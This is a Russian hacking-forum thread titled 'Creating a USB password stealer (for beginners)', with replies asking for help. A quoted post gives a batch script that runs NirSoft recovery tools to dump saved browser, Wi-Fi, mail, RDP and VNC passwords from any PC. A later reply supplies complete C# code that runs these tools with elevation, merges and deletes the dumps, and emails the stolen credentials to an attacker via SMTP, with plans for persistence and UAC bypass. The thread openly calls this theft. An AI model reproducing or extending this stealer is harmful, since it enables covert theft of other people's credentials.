Статья Создаем USB stealer паролей (для начинающих)

maroon5 · 25.11.2019

Ничего не вышло, не находит файл на запуск

Riki Jakiro · 06.12.2019

Ubop0202 сказал(а):
Приветсвую!
Мой первый пост, так что не судите строго
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (~~кражи~~) паролей с нужной для тебя рабочей станции.

Посмотреть вложение 19015

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта
Ссылка скрыта от гостей
:

MessenPass

Mail PassView

Protected Storage PassView

Dialupass

BulletsPassView

Network Password Recovery

SniffPass Password Sniffer

RouterPassView

PstPassword

WebBrowserPassView

WirelessKeyView

Remote Desktop PassView

VNCPassView

После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

Код:

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt start Dialupass.exe /stext Dialupass.txt start BulletsPassView.exe /stext BulletsPassView.txt start netpass.exe /stext netpass.txt start sniffpass.exe /stext sniffpass.txt start RouterPassView.exe /stext RouterPassView.txt start PstPassword.exe /stext PstPassword.txt start WebBrowserPassView.exe /stext WebBrowserPassView.txt start WirelessKeyView.exe /stext WirelessKeyView.txt start rdpv.exe /stext rdpv.txt start VNCPassView.exe /stext VNCPassView.txt

после сохранив его как backup.bat, копируем на флешку.

4) Вуаля, вы восхитительны! Можете вставить флешку в любой ПК, запустить backup.bat и у вас создадутся *.txt файлы с паролями браузеров, wifi, vnc и т.д.

От автора:
1) в чем плюс данного метода? вышеуказанный софт, вы качаете с офф.сайта (собственно уже можно быть уверенным, что к ним не привязаны другие вирусы от автора статьи)
2) также можно воспользоваться данной тулзой: The LaZagne Project , если будет интересно запилю howto на русском языке.

Пж на русском

worlak · 13.01.2020

А как сделать такую же только для андроид?

L5DKAP · 14.02.2020

Всем привет, сидел ковырял C# по стандарту, собственно вот из этого вышло

Первое что делаем, так это идем на сайт

Ссылка скрыта от гостей

. Видим это и жмякаем на 'the download link'. (На скриншоте ниже)
У меня вышло несколько проблем с этим изначально, и не хочу чтобы у кого-либо вышло так же, в общем если скачивать иначе (по отдельности,Паком по другой ссылке на их странице) то к сожалению вы скачаете программы без возможности запускать с параметрами /stext что немало важно.

Вводим в текстбокс username : download
И в текстбокс password : nirsoft123!

Скачиваем, создаем новый проект WPA C# , создаём папку 'files' в папке с EXE-шником проекта, в эту папку закидываем всё скаченное.

Добавляем в using:

C#:

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Diagnostics;
using System.Text.RegularExpressions;
using System.Threading;
using System.Net.Mail;
using System.Net;

Заходим в Program.cs и пишем за место Application.Run(new Form1()); :

C#:

            Form1 ew = new Form1();
            Application.Run();

Это позволит нам запускать проект без формы.

Вставляем в проект этот код:

Код:

        static string path = Environment.CurrentDirectory + @"\files";
        static string pathtooutput = Environment.CurrentDirectory + @"\output.txt";
        static string[] exeFiles = Directory.GetFiles(path,"*.exe");
        static List<string> outputFiles = new List<string>();
        static string regtext = @"files\\(.*).exe";

        static void startExe() {
            int i = 0;
            foreach (string exe in exeFiles){
                string reg = Regex.Match(exe, regtext).Groups[1] + ".txt";
                outputFiles.Add(reg);
                Process _process = new Process();
                ProcessStartInfo startInfo = new ProcessStartInfo();
                startInfo.FileName = exe;
                startInfo.Verb = "runas";
                startInfo.Arguments = "/stext " + reg;
                _process.StartInfo = startInfo;
                _process.Start();
            }
        }
        static void saveFile(string[] sourceFiles, string destFile) {       
            using (StreamWriter writer = new StreamWriter(destFile, false, Encoding.Default))
            {
                foreach (string sourceFile in sourceFiles)
                {
                    string[] strArray = File.ReadAllLines(sourceFile);
                    foreach(string line in strArray)
                    {
                        writer.WriteLine(line);
                    }
                }
            }
            foreach (string sourceFile in sourceFiles){
                File.Delete(sourceFile);
            }
        }
       public static void sendMail(string smtpServer, string from, string password,
       string mailto, string caption, string message, string attachFile = null)
        {
            try
            {
                MailMessage mail = new MailMessage();
                mail.From = new MailAddress(from);
                mail.To.Add(new MailAddress(mailto));
                mail.Subject = caption;
                mail.Body = message;
                if (!string.IsNullOrEmpty(attachFile))
                    mail.Attachments.Add(new Attachment(attachFile));
                SmtpClient client = new SmtpClient();
                client.Host = smtpServer;
                client.Port = 587;
                client.EnableSsl = true;
                client.Credentials = new NetworkCredential(from.Split('@')[0], password);
                client.DeliveryMethod = SmtpDeliveryMethod.Network;
                client.Send(mail);
                mail.Dispose();
            }
            catch
            {

            }
        }
        public Form1()
        {
            InitializeComponent();
            //Запуск EXE файлов находящихся в папке 'files'
            startExe();
            //Пауза необходимая для того что бы текстовые файлы успели создаться
            Thread.Sleep(1500);
            //Замешать все имеющиеся выходные файлы
            saveFile(outputFiles.ToArray<string>(), "output.txt");
            //Отправка на почту SMTP
            sendMail("smtp.yandex.ru", "Почта@ya.ru", "Пароль", "Почта на которую льём@ya.ru", "ПАРОЛИ", pathtooutput, pathtooutput);
            Environment.Exit(0);
        }

Компилируем и записываемся на ноготочки девчата

Итак что же он делает? запускает все EXE файлы из папки 'files' с параметрами '/stext' (Открывает без окна программу и записывает логи в файл), и замешивает эти файлы в один, далее отправляет на почту которую вы укажете в функции 'sendMail'.
Я потратил пару часиков на поиски обхода UAC, но ничего интересного не нашел на C# , поэтому решил бросить это дело, я думаю добавить засидку этого проекта в систему, автосохранение и скрытие на новых USB устройствах. Так же хочу спросить у людей которые здесь собираются есть ли возможность и есть ли толк в том чтобы найти возможность пересылать на onion почтовухи.

Плюсаните если вам хочется что бы я продолжил выкладывать дополнения к коду.
Не судите строго т.к. первая моя статья на протяжении всей жизни.
F посоны

Денис · 18.03.2020

wittmann404 сказал(а):
Какая команда в батнике должна быть чтобы ModDumper записывал все в файлик?

можно новую ссылку?

Volkodavr · 13.05.2020

Выдаёт ошибку.Проверьте правильно указано имя и повторите попытку
Что не так ?

Tv Ru · 11.08.2020

А пароль с винды будет скачан

Арсений Варновский · 20.12.2022

А скажите пожалуйста скачивать 1 вайл или все что написаны в статье?

Все сервисы Codeby

Поиск

Поиск

Статья Создаем USB stealer паролей (для начинающих)

maroon5

New member

Riki Jakiro

New member

worlak

New member

L5DKAP

Денис

New member

Volkodavr

New member

Tv Ru

New member

Арсений Варновский

New member